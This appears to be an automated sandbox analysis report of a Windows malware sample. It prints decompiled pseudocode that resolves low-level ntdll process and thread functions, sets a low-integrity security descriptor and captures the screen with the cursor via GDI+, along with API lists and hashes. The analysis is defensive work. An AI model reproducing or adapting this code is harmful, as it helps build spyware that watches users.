        			E004022B1(char** __ecx) {
        				void* _t9;
        				void* _t17;
        
        				L00402586();
        				_push(__ecx);
        				 *((intOrPtr*)(_t17 - 0x10)) = __ecx;
        				 *__ecx = "P!@";
        				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
        				_t9 = E00401DD5( &(__ecx[3]), 1);
        				 *(_t17 - 4) =  *(_t17 - 4) | 0xffffffff;
        				L0040271E();
        				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
        				return _t9;
        			}






        APIs
        • _EH_prolog.MSVCRT ref: 004022B6
        • ??1exception@@UAE@XZ.MSVCRT(00000001,?,?,invalid string position), ref: 004022DC
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ??1exception@@H_prolog
        • String ID: P!@
        • API String ID: 1656532167-1774101457
        • Opcode ID: dacfea25433732980db300b18ec870d966422ee7c7e7e9598b246d4d4ab46073
        • Instruction ID: 31e2c1cb12423125ed0a21eae19ed48514e4c5156cda51c9944febb9a22617b8
        • Opcode Fuzzy Hash: dacfea25433732980db300b18ec870d966422ee7c7e7e9598b246d4d4ab46073
        • Instruction Fuzzy Hash: F6E04F71910610ABC724AF58D91579DB7B8EF48724F10876FA062B31C0C7F85A008788
        Uniqueness

        Uniqueness Score: -1.00%

        Executed Functions

        C-Code - Quality: 87%
        			E00412D30(signed int** __ecx, void* __edx, signed char _a4) {
        				char _v537;
        				char _v788;
        				char _v796;
        				char _v808;
        				intOrPtr _v816;
        				intOrPtr _v820;
        				signed int _v824;
        				intOrPtr _v828;
        				signed int** _v832;
        				struct HINSTANCE__* _v836;
        				void* __edi;
        				void* __esi;
        				signed int _t40;
        				struct HINSTANCE__* _t43;
        				struct HINSTANCE__* _t47;
        				_Unknown_base(*)()* _t53;
        				void* _t54;
        				signed int _t57;
        				void** _t58;
        				signed int _t62;
        				signed int _t64;
        				signed int _t65;
        				signed int _t67;
        				void* _t73;
        				intOrPtr _t77;
        				signed int _t78;
        				signed int _t79;
        				signed int _t80;
        				struct HINSTANCE__* _t81;
        				int _t83;
        				signed int _t86;
        				void* _t89;
        				signed int* _t91;
        				signed int _t95;
        				WCHAR* _t97;
        				void* _t98;
        				signed int* _t100;
        
        				_t89 = __edx;
        				_t87 = __ecx;
        				_t95 = _a4 & 0x00000001;
        				_v824 = _t95;
        				if(_t95 != 0) {
        					_t83 = 0;
        					__eflags = 0;
        				} else {
        					_t83 = 0;
        					 *0x4238a0 = 0;
        				}
        				_t91 = E004129EB();
        				 *0x4238b8 = _t91;
        				if(_t91 == _t83) {
        					L27:
        					_t40 = 0;
        				} else {
        					if(_t95 != _t83) {
        						_v824 = E00412925(_t87, _t89, _t91, "GetProcAddress");
        						_v824 = E00412925(_t87, _t89, _t91, "LoadLibraryA");
        						_t43 =  *0x4238b4;
        						_v836 = _t43;
        						_t87 =  *((intOrPtr*)(_t43 + 0x3c)) + _t43 + 0x80;
        						__eflags = _v824 - _t83;
        						if(_v824 == _t83) {
        							goto L21;
        						} else {
        							__eflags = _v820 - _t83;
        							if(_v820 == _t83) {
        								goto L21;
        							} else {
        								_t91 =  *_t87;
        								__eflags = _t91 - _t83;
        								if(_t91 <= _t83) {
        									goto L21;
        								} else {
        									__eflags = _t87[1] - 0x14;
        									if(_t87[1] <= 0x14) {
        										goto L21;
        									} else {
        										_t91 = _t91 + _t43;
        										__eflags =  *_t91 - _t83;
        										if( *_t91 == _t83) {
        											goto L21;
        										} else {
        											while(1) {
        												_t77 = _v816(_t91[3] + _v828);
        												_v816 = _t77;
        												__eflags = _t77 - _t83;
        												if(_t77 == _t83) {
        													goto L27;
        												}
        												_t100 = _v832 +  *_t91;
        												_t86 = _v832 + _t91[4];
        												while(1) {
        													_t78 =  *_t100;
        													__eflags = _t78;
        													if(__eflags == 0) {
        														break;
        													}
        													if(__eflags >= 0) {
        														_t87 = _v832;
        														_t79 =  &(_v832[0]) + _t78;
        													} else {
        														_t79 = _t78 & 0x0000ffff;
        													}
        													_t80 = _v824(_v816, _t79);
        													__eflags = _t80;
        													if(_t80 == 0) {
        														goto L27;
        													} else {
        														 *_t86 = _t80;
        														_t100 =  &(_t100[1]);
        														_t86 = _t86 + 4;
        														__eflags = _t86;
        														continue;
        													}
        													goto L47;
        												}
        												_t91 =  &(_t91[5]);
        												_t83 = 0;
        												__eflags =  *_t91;
        												if( *_t91 != 0) {
        													continue;
        												} else {
        													goto L21;
        												}
        												goto L47;
        											}
        											goto L27;
        										}
        									}
        								}
        							}
        						}
        					} else {
        						_t81 = GetModuleHandleW(_t83);
        						 *0x4238b4 = _t81;
        						if(_t81 == _t83) {
        							goto L27;
        						} else {
        							L21:
        							_t97 =  &_v808;
        							E004128DB(0xe5, _t97);
        							_t47 = GetModuleHandleW(_t97);
        							 *0x4238bc = _t47;
        							if(_t47 == _t83) {
        								goto L27;
        							} else {
        								_t98 = GetProcAddress;
        								 *0x4238c0 = GetProcAddress(_t47, "NtCreateThread");
        								 *0x4238c4 = GetProcAddress( *0x4238bc, "NtCreateUserProcess");
        								 *0x4238c8 = GetProcAddress( *0x4238bc, "NtQueryInformationProcess");
        								 *0x4238cc = GetProcAddress( *0x4238bc, "RtlUserThreadStart");
        								 *0x4238d0 = GetProcAddress( *0x4238bc, "LdrLoadDll");
        								_t53 = GetProcAddress( *0x4238bc, "LdrGetDllHandle");
        								 *0x4238d4 = _t53;
        								if( *0x4238c0 != _t83 ||  *0x4238c4 != _t83) {
        									if( *0x4238c8 == _t83 ||  *0x4238d0 == _t83 || _t53 == _t83) {
        										goto L27;
        									} else {
        										_t54 = HeapCreate(_t83, 0x80000, _t83); // executed
        										 *0x423774 = _t54;
        										__eflags = _t54 - _t83;
        										if(_t54 != _t83) {
        											 *0x422463 = 1;
        										} else {
        											 *0x423774 = GetProcessHeap();
        											 *0x422463 = 0;
        										}
        										 *0x422da8 = _t83;
        										 *0x422462 = 0;
        										InitializeCriticalSection(0x423dd4);
        										 *0x423dec = _t83; // executed
        										__imp__#115(0x202,  &_v788); // executed
        										_t57 = E00412A25(_a4, _t87, _t91, _t98);
        										__eflags = _t57;
        										if(_t57 == 0) {
        											goto L27;
        										} else {
        											__eflags = _v832 - _t83;
        											if(_v832 != _t83) {
        												L34:
        												_t58 = E0040D7D9(_t87, 0xffffffff, 0x4238b0);
        												 *0x4238a4 = _t58;
        												__eflags = _t58 - _t83;
        												if(_t58 == _t83) {
        													goto L27;
        												} else {
        													 *0x4238a8 = GetLengthSid( *_t58);
        													 *0x4238ac = E0040D571( *( *0x4238a4), _t59);
        													_t62 = E00412AA4(_t61, _a4);
        													__eflags = _t62;
        													if(_t62 == 0) {
        														goto L27;
        													} else {
        														 *0x423b10 = GetCurrentProcessId();
        														 *0x423b14 = _t83;
        														__eflags = _v832 - _t83;
        														if(_v832 != _t83) {
        															_t64 = 1;
        														} else {
        															_t64 = E00412B06();
        														}
        														__eflags = _t64;
        														if(_t64 == 0) {
        															goto L27;
        														} else {
        															__eflags = _v832 - _t83;
        															if(_v832 == _t83) {
        																E0041341A( &_v796);
        																_t87 = 0x423d0e;
        																E0041081B(0x423d0e, 0x423b18,  *0x4238ac,  &_v537, _t83);
        															}
        															_t65 = E00412B58(_a4);
        															__eflags = _t65;
        															if(_t65 == 0) {
        																goto L27;
        															} else {
        																__eflags = _a4 & 0x00000002;
        																 *0x423784 = _t83;
        																 *0x422468 = 0;
        																 *0x422400 = 0;
        																 *0x422918 = 0;
        																 *0x4228b0 = 0;
        																 *0x423df0 = 0;
        																 *0x423d70 = 0;
        																if(__eflags == 0) {
        																	_t67 = 1;
        																} else {
        																	_t67 = E00412C0F(_t87, _t89, __eflags);
        																}
        																__eflags = _t67;
        																_t38 = _t67 != 0;
        																__eflags = _t38;
        																_t40 = _t67 & 0xffffff00 | _t38;
        															}
        														}
        													}
        												}
        											} else {
        												_t73 = CreateEventW(0x4238d8, 1, _t83, _t83);
        												 *0x423d68 =  *0x423d68 | 0xffffffff;
        												 *0x423d64 = _t73;
        												__eflags = _t73 - _t83;
        												if(_t73 == _t83) {
        													goto L27;
        												} else {
        													goto L34;
        												}
        											}
        										}
        									}
        								} else {
        									goto L27;
        								}
        							}
        						}
        					}
        				}
        				L47:
        				return _t40;
        			}

        APIs
        • GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00412D71
        • GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00412E47
        • GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00412E66
        • GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00412E78
        • GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00412E8A
        • GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 00412E9C
        • GetProcAddress.KERNEL32(LdrLoadDll), ref: 00412EAE
        • GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 00412EC0
        • HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 00412EF9
        • GetProcessHeap.KERNEL32(?,?,00000000), ref: 00412F08
        • InitializeCriticalSection.KERNEL32(00423DD4,?,?,00000000), ref: 00412F35
        • WSAStartup.WS2_32(00000202,?), ref: 00412F4B
        • CreateEventW.KERNEL32(004238D8,00000001,00000000,00000000,?,?,00000000), ref: 00412F6C
        • GetLengthSid.ADVAPI32(00000000,000000FF,004238B0,?,?,00000000), ref: 00412FA1
        • GetCurrentProcessId.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 00412FCE
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
        • String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
        • API String ID: 3091071419-305303173
        • Opcode ID: a2a261186f04931f6ccb4ef6965da0795b3a0dab78e248b1726a36016c670151
        • Instruction ID: 0285fe6d69633572b52a5e6faad45937bebd7ed400e44a306ec3287023ebc47b
        • Opcode Fuzzy Hash: a2a261186f04931f6ccb4ef6965da0795b3a0dab78e248b1726a36016c670151
        • Instruction Fuzzy Hash: 37916AB17003419FCB20AF64AE846967BF4FB44306B50043FF941E7261D7B89A96CB5D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E0040F7B1(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
        				signed int _v8;
        				struct _ACL* _v12;
        				int _v16;
        				int _v20;
        				void** _t19;
        				struct _SECURITY_DESCRIPTOR* _t28;
        				intOrPtr* _t29;
        
        				_t29 = __esi;
        				_t28 = __edi;
        				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
        					return 0;
        				} else {
        					_t19 =  &_v8;
        					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
        					if(_t19 == 0) {
        						L6:
        						_v8 = _v8 | 0xffffffff;
        						L7:
        						if(_t29 != 0) {
        							 *_t29 = 0xc;
        							 *(_t29 + 4) = _t28;
        							 *((intOrPtr*)(_t29 + 8)) = 0;
        						}
        						return _v8;
        					}
        					_v12 = 0;
        					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
        						LocalFree(_v8);
        						goto L6;
        					} else {
        						goto L7;
        					}
        				}
        			}

        APIs
        • InitializeSecurityDescriptor.ADVAPI32(004238E4,00000001,00000000,00412F59,?,?,00000000), ref: 0040F7BB
        • SetSecurityDescriptorDacl.ADVAPI32(004238E4,00000001,00000000,00000000,?,?,00000000), ref: 0040F7CC
        • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0040F7E2
        • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 0040F7FE
        • SetSecurityDescriptorSacl.ADVAPI32(004238E4,?,?,?,?,?,00000000), ref: 0040F812
        • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 0040F81F
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
        • String ID: S:(ML;;NRNWNX;;;LW)
        • API String ID: 2050860296-820036962
        • Opcode ID: f6854562f6b39a1e0a24887e409eb5f2ad18f262c7977427dc2031e594910f7a
        • Instruction ID: f7f013c1c474213b982dd55d9c095e7f549268e7b311508b506c35fb7f07a90b
        • Opcode Fuzzy Hash: f6854562f6b39a1e0a24887e409eb5f2ad18f262c7977427dc2031e594910f7a
        • Instruction Fuzzy Hash: BD114F72A00209FBEB21AFA19E85AEFBBBCAB04740F10807AF551F15A0D7759A449A14
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 53%
        			E00410765() {
        				void* _t30;
        				void* _t33;
        				intOrPtr* _t35;
        				void* _t36;
        				void* _t39;
        				void* _t41;
        
        				_t39 = _t41 - 0x74;
        				_t17 = _t39 - 0x260;
        				 *((char*)(_t39 + 0x73)) = 0;
        				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
        				if(_t17 != 0) {
        					L8:
        					E0040C275(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
        				} else {
        					PathAddBackslashW(_t39 - 0x260);
        					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
        					while(1) {
        						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
        						if(_t17 != 0) {
        							break;
        						}
        						PathRemoveBackslashW(_t39 - 0x260);
        						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
        							goto L8;
        						} else {
        							PathAddBackslashW(_t39 - 0x260);
        							continue;
        						}
        						goto L9;
        					}
        					if( *((short*)(_t39 - 0x44)) != 0x7b) {
        						goto L8;
        					} else {
        						 *((short*)(_t39 + 8)) = 0;
        						_t17 = _t39 - 0x44;
        						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
        						if(_t17 != 0) {
        							goto L8;
        						} else {
        							 *((char*)(_t39 + 0x73)) = 1;
        						}
        					}
        				}
        				L9:
        				return  *((intOrPtr*)(_t39 + 0x73));
        			}

        APIs
        • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,0001FEBC,00000000), ref: 00410784
        • PathAddBackslashW.SHLWAPI(?), ref: 0041079B
        • PathRemoveBackslashW.SHLWAPI(?), ref: 004107AC
        • PathRemoveFileSpecW.SHLWAPI(?), ref: 004107B9
        • PathAddBackslashW.SHLWAPI(?), ref: 004107CA
        • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 004107D9
        • CLSIDFromString.OLE32(?,?), ref: 004107F3
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
        • String ID:
        • API String ID: 613918483-0
        • Opcode ID: dd18464de683040582eedb859b7376750294c14d175945f9d7dec54d2c2fa365
        • Instruction ID: 8ddc4772f7f2cad33d74db1f090c0e50ea7e5adbc3361b3ec96a286fa6aaa82c
        • Opcode Fuzzy Hash: dd18464de683040582eedb859b7376750294c14d175945f9d7dec54d2c2fa365
        • Instruction Fuzzy Hash: D1114F7190820DAADF20ABB0DD88EDF77BCAB04344F14047AE514E6160E779DA889B64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			_entry_(signed int __ecx, void* __edx, void* __eflags, void* __fp0) {
        				char _v5;
        				int _v12;
        				char _v16;
        				char _v20;
        				void* _t22;
        				void* _t28;
        				char _t29;
        				char _t33;
        				signed int _t36;
        				void* _t51;
        
        				_t51 = __fp0;
        				_t34 = __ecx;
        				_t33 = 0; // executed
        				_t22 = E00412D30(__ecx, __edx, 0); // executed
        				if(_t22 == 0) {
        					L24:
        					__eflags = _t33;
        					_t21 = _t33 == 0;
        					__eflags = _t21;
        					ExitProcess(0 | _t21);
        				}
        				_v20 = 0;
        				_v16 = 1;
        				_v5 = 0;
        				SetErrorMode(0x8007);
        				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
        				if(_t28 == 0) {
        					L19:
        					_t29 = E00413970(_t34, __eflags, _t51, _v20, _v16);
        					L20:
        					_t33 = _t29;
        					L21:
        					if(_t33 == 0 || ( *0x4238a0 & 0x00000002) == 0) {
        						goto L24;
        					} else {
        						Sleep(0xffffffff);
        						return _t29;
        					}
        				}
        				_t36 = 0;
        				if(_v12 <= 0) {
        					L14:
        					LocalFree(_t28);
        					_t48 = _t33;
        					if(_t33 == 0) {
        						__eflags = _v5;
        						if(__eflags == 0) {
        							goto L19;
        						}
        						E00416B62(_t36);
        						_t29 = E0040ABE3();
        						__eflags =  *0x4238a0 & 0x00000004;
        						_t33 = _t29;
        						if(( *0x4238a0 & 0x00000004) != 0) {
        							_t29 = E004169DB(0x423e80, 0);
        						}
        						goto L21;
        					}
        					_t29 = E00413782(_t48);
        					goto L20;
        				} else {
        					goto L3;
        				}
        				do {
        					L3:
        					_t34 =  *(_t28 + _t36 * 4);
        					if(_t34 != 0 &&  *_t34 == 0x2d) {
        						_t34 =  *(_t34 + 2) & 0x0000ffff;
        						if(_t34 == 0x66) {
        							_v20 = 1;
        						} else {
        							if(_t34 == 0x69) {
        								_t33 = 1;
        							} else {
        								if(_t34 == 0x6e) {
        									_v16 = 0;
        								} else {
        									if(_t34 == 0x76) {
        										_v5 = 1;
        									}
        								}
        							}
        						}
        					}
        					_t36 = _t36 + 1;
        				} while (_t36 < _v12);
        				goto L14;
        			}

        APIs
          • Part of subcall function 00412D30: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00412D71
          • Part of subcall function 00412D30: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00412E47
          • Part of subcall function 00412D30: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00412E66
          • Part of subcall function 00412D30: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00412E78
          • Part of subcall function 00412D30: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00412E8A
          • Part of subcall function 00412D30: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 00412E9C
          • Part of subcall function 00412D30: GetProcAddress.KERNEL32(LdrLoadDll), ref: 00412EAE
          • Part of subcall function 00412D30: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 00412EC0
        • SetErrorMode.KERNEL32(00008007,00000000), ref: 00413CDE
        • GetCommandLineW.KERNEL32(?), ref: 00413CE8
        • CommandLineToArgvW.SHELL32(00000000), ref: 00413CEF
        • LocalFree.KERNEL32(00000000), ref: 00413D44
        • Sleep.KERNEL32(000000FF,?,00000001), ref: 00413D9A
        • ExitProcess.KERNEL32 ref: 00413DAB
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
        • String ID:
        • API String ID: 1184560534-0
        • Opcode ID: 6006af1fb8caaa1f2bf40058cba84c4ec48fe1e2af7cf33988bd6f667ad6e11f
        • Instruction ID: 6490d8834e17bbd889de1c0184e76a29c14593038c0ae40773f2a52d0e1e8666
        • Opcode Fuzzy Hash: 6006af1fb8caaa1f2bf40058cba84c4ec48fe1e2af7cf33988bd6f667ad6e11f
        • Instruction Fuzzy Hash: DC2129B09442C499CB146FB5EA183EE3BA46F0230BF18449FE0526A2A2C77D4BC5C71E
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        C-Code - Quality: 38%
        			E0040BC07(WCHAR* _a4, char _a8, signed short _a12) {
        				struct HINSTANCE__* _v12;
        				struct HINSTANCE__* _v16;
        				struct HINSTANCE__* _v20;
        				_Unknown_base(*)()* _v24;
        				void* _v28;
        				void* _v32;
        				struct HDC__* _v36;
        				_Unknown_base(*)()* _v40;
        				_Unknown_base(*)()* _v44;
        				struct tagPOINT _v52;
        				_Unknown_base(*)()* _v56;
        				struct HINSTANCE__* _v60;
        				_Unknown_base(*)()* _v64;
        				_Unknown_base(*)()* _v68;
        				_Unknown_base(*)()* _v72;
        				_Unknown_base(*)()* _v76;
        				_Unknown_base(*)()* _v80;
        				_Unknown_base(*)()* _v84;
        				_Unknown_base(*)()* _v88;
        				struct HINSTANCE__* _v92;
        				struct HINSTANCE__* _v96;
        				struct HINSTANCE__* _v100;
        				char _v104;
        				_Unknown_base(*)()* _v108;
        				intOrPtr _v112;
        				char _v116;
        				_Unknown_base(*)()* _v120;
        				char _v148;
        				signed int _v152;
        				struct _ICONINFO _v172;
        				char _v188;
        				struct HINSTANCE__* _t169;
        				_Unknown_base(*)()* _t176;
        				struct HINSTANCE__* _t181;
        				_Unknown_base(*)()* _t182;
        				struct HINSTANCE__* _t183;
        				_Unknown_base(*)()* _t191;
        				struct HDC__* _t197;
        				struct HICON__* _t199;
        				signed int _t200;
        				intOrPtr _t202;
        				intOrPtr _t204;
        				void* _t206;
        				void* _t223;
        				intOrPtr* _t224;
        				void* _t239;
        				void* _t248;
        				unsigned int _t260;
        				intOrPtr* _t262;
        				signed short _t263;
        				intOrPtr _t264;
        				WCHAR** _t265;
        				intOrPtr _t268;
        				signed int _t269;
        				signed int _t272;
        				void* _t275;
        
        				_v32 = 0;
        				_v60 = 0;
        				_v16 = 0;
        				_v104 = 1;
        				_v100 = 0;
        				_v96 = 0;
        				_v92 = 0;
        				_t169 = LoadLibraryA("gdiplus.dll");
        				_v20 = _t169;
        				_v24 = GetProcAddress(_t169, "GdiplusStartup");
        				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
        				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
        				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
        				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
        				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
        				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
        				_v108 = _t176;
        				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
        					L66:
        					if(_v20 != 0) {
        						FreeLibrary(_v20);
        					}
        					if(_v60 != 0) {
        						FreeLibrary(_v60);
        					}
        					if(_v16 != 0) {
        						FreeLibrary(_v16);
        					}
        					return _v32;
        				} else {
        					_t181 = LoadLibraryA("ole32.dll");
        					_v60 = _t181;
        					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
        					_v120 = _t182;
        					if(_t182 == 0) {
        						goto L66;
        					}
        					_t183 = LoadLibraryA("gdi32.dll");
        					_v16 = _t183;
        					_t262 = GetProcAddress(_t183, "CreateDCW");
        					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
        					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
        					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
        					_v56 = GetProcAddress(_v16, "SelectObject");
        					_v76 = GetProcAddress(_v16, "BitBlt");
        					_v84 = GetProcAddress(_v16, "DeleteObject");
        					_t191 = GetProcAddress(_v16, "DeleteDC");
        					_v68 = _t191;
        					if(_t262 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
        						goto L66;
        					} else {
        						_push(0);
        						_push( &_v104);
        						_push( &_v116);
        						_v104 = 1;
        						_v100 = 0;
        						_v96 = 0;
        						_v92 = 0;
        						if(_v24() != 0) {
        							goto L66;
        						}
        						_t268 =  *_t262(L"DISPLAY", 0, 0, 0);
        						_v24 = _t268;
        						if(_t268 == 0) {
        							L65:
        							_v80(_v116);
        							goto L66;
        						}
        						_t197 = _v12(_t268);
        						_v36 = _t197;
        						if(_t197 == 0) {
        							L64:
        							_v68(_v24);
        							goto L65;
        						}
        						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
        						_v12 = _t199;
        						if(_t199 == 0) {
        							L24:
        							_t263 = 0;
        							goto L26;
        						} else {
        							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
        								_v12 = 0;
        							}
        							if(_v12 != 0) {
        								_t263 = _a12;
        								L26:
        								if(_t263 == 0) {
        									_t200 = _v28(_t268, 8);
        									_t269 = _t200;
        									_a12 = _v28(_v24, 0xa);
        								} else {
        									_t269 = _t263 & 0x0000ffff;
        									_a12 = _t269;
        								}
        								_t202 = _v44(_v24, _t269, _a12);
        								_v44 = _t202;
        								if(_t202 == 0) {
        									L63:
        									_v68(_v36);
        									goto L64;
        								} else {
        									_t204 = _v56(_v36, _t202);
        									_v112 = _t204;
        									if(_t204 == 0) {
        										L62:
        										_v84(_v44);
        										goto L63;
        									}
        									_t206 = 0;
        									_t248 = 0;
        									if(_t263 != 0) {
        										_t260 = (_t263 & 0x0000ffff) >> 1;
        										_t206 =  <  ? 0 : _v52.x - _t260;
        										_t248 =  <  ? 0 : _v52.y - _t260;
        										_t81 =  &_v52;
        										 *_t81 = _v52.x - _t206;
        										if( *_t81 < 0) {
        											_v52.x = 0;
        										}
        										_t84 =  &(_v52.y);
        										 *_t84 = _v52.y - _t248;
        										if( *_t84 < 0) {
        											_v52.y = 0;
        										}
        									}
        									_push(0x40cc0020);
        									_push(_t248);
        									_push(_t206);
        									_push(_v24);
        									_push(_a12);
        									_push(_t269);
        									_push(0);
        									_push(0);
        									_push(_v36);
        									if(_v76() == 0) {
        										L61:
        										_v56(_v36, _v112);
        										goto L62;
        									} else {
        										if(_v12 != 0) {
        											_t254 =  <  ? 0 : _v52.x - _v172.xHotspot;
        											_t239 = _v52.y - _v172.yHotspot;
        											_t240 =  <  ? 0 : _t239;
        											DrawIcon(_v36,  <  ? 0 : _v52.x - _v172.xHotspot,  <  ? 0 : _t239, _v12);
        										}
        										_push( &_v12);
        										_push(0);
        										_push(_v44);
        										_v12 = 0;
        										if(_v88() != 0 || _v12 == 0) {
        											goto L61;
        										} else {
        											_push( &_v28);
        											_push( &_a12);
        											_a12 = 0;
        											_v28 = 0;
        											if(_v40() != 0) {
        												L60:
        												_v72(_v12);
        												goto L61;
        											}
        											_t215 = _v28;
        											if(_v28 == 0 || _a12 == 0) {
        												goto L60;
        											} else {
        												_t264 = E0040C192(_t215);
        												_v40 = _t264;
        												if(_t264 == 0) {
        													goto L60;
        												}
        												_push(_t264);
        												_push(_v28);
        												_push(_a12);
        												if(_v64() != 0) {
        													L52:
        													E0040C1C2(_v40);
        													if(_a12 == 0) {
        														_push( &_v32);
        														_push(1);
        														_push(0);
        														if(_v120() == 0 && _v32 != 0) {
        															_v152 = 0;
        															if(_a8 > 0) {
        																E0040C1FE( &_v148, 0x401808, 0x10);
        																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x7c)) = 4;
        																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x80)) = 1;
        																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x78)) =  &_a8;
        																_v152 = _v152 + 1;
        															}
        															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
        															_t224 = _v32;
        															if(_t223 == 0) {
        																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
        															} else {
        																 *((intOrPtr*)( *_t224 + 8))(_t224);
        																_v32 = 0;
        															}
        														}
        													}
        													goto L60;
        												}
        												_t272 = 0;
        												if(_a12 <= 0) {
        													goto L52;
        												}
        												_t265 = _t264 + 0x30;
        												while(lstrcmpiW(_a4,  *_t265) != 0) {
        													_t272 = _t272 + 1;
        													_t265 =  &(_t265[0x13]);
        													if(_t272 < _a12) {
        														continue;
        													}
        													goto L52;
        												}
        												E0040C1FE( &_v188, _t272 * 0x4c + _v40, 0x10);
        												_a12 = 0;
        												goto L52;
        											}
        										}
        									}
        								}
        							}
        							goto L24;
        						}
        					}
        				}
        			}

        APIs
        • LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 0040BC39
        • GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040BC4A
        • GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 0040BC57
        • GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 0040BC64
        • GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 0040BC71
        • GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 0040BC7E
        • GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 0040BC8B
        • GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0040BC98
        • LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 0040BCE0
        • GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040BCEB
